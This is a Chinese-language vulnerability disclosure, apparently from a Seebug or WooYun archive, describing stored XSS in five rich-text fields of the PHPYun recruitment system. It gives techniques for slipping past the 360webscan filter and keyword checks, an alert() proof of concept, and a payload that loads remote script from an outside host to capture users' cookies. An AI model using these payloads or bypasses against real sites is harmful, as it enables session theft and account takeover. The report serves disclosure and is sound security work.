### 简要描述:
梦见一个getshell,但因为该死的过滤没绕过。。发xss吧。。。
多处打包,还不走大厂商吗?
### 详细说明:
phpyun云人才系统处理富文本时,只在客户端进行过滤,服务端没有进行过滤,导致多个富文本编辑框产生XSS。
说一下各个位置。
01.企业用户资料处:member/index.php?C=info
02.企业用户发布招聘信息处:member/index.php?C=jobadd
03.问答系统提问处:ask/index.php?C=addquestion
04.朋友圈发表状态:friend/index.php
05.在线粘贴简历处:member/index.php?C=expectq&add=7
这里提一些点。
首先,要绕过360webscan的防御正则,这个好说,只要<img标签不闭合即可。
还要绕过一些关键词检查,用16进制的html字符实体替换原字符即可。
### 漏洞证明:
就拿在线粘贴简历的地方做示范吧。
[<img src="https://images.seebug.org/upload/201405/13010819fce50f4a7ca609315835910d99dbd6be.jpg" alt="06.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/13010819fce50f4a7ca609315835910d99dbd6be.jpg)
里面有一个富文本编辑框:
[<img src="https://images.seebug.org/upload/201405/1301093737f32af0562b4e30cc3fd6c7d7dbcd31.jpg" alt="07.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1301093737f32af0562b4e30cc3fd6c7d7dbcd31.jpg)
我随便输点东西,然后抓包,修改doc为我的payload:
```
<img src="#" onerror="alert(/xss/)"
```
[<img src="https://images.seebug.org/upload/201405/1301114356e8fed268ad8ef82dbdb74449d63680.jpg" alt="08.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1301114356e8fed268ad8ef82dbdb74449d63680.jpg)
然后提交。一份有xss的简历就生成好了:
[<img src="https://images.seebug.org/upload/201405/13011249f9ad9186bb28607e2d50760b7d4bb2ca.jpg" alt="05.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/13011249f9ad9186bb28607e2d50760b7d4bb2ca.jpg)
给一个加载远程js的exp:
```
<img src="#" onerror="$.getScript('//xss.com/9WfKui')"
```
可收到cookie:
[<img src="https://images.seebug.org/upload/201405/1301260155f9fc64199f8c33eeb3326b468a326b.jpg" alt="09.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1301260155f9fc64199f8c33eeb3326b468a326b.jpg)
京公网安备 11010502034610号
暂无评论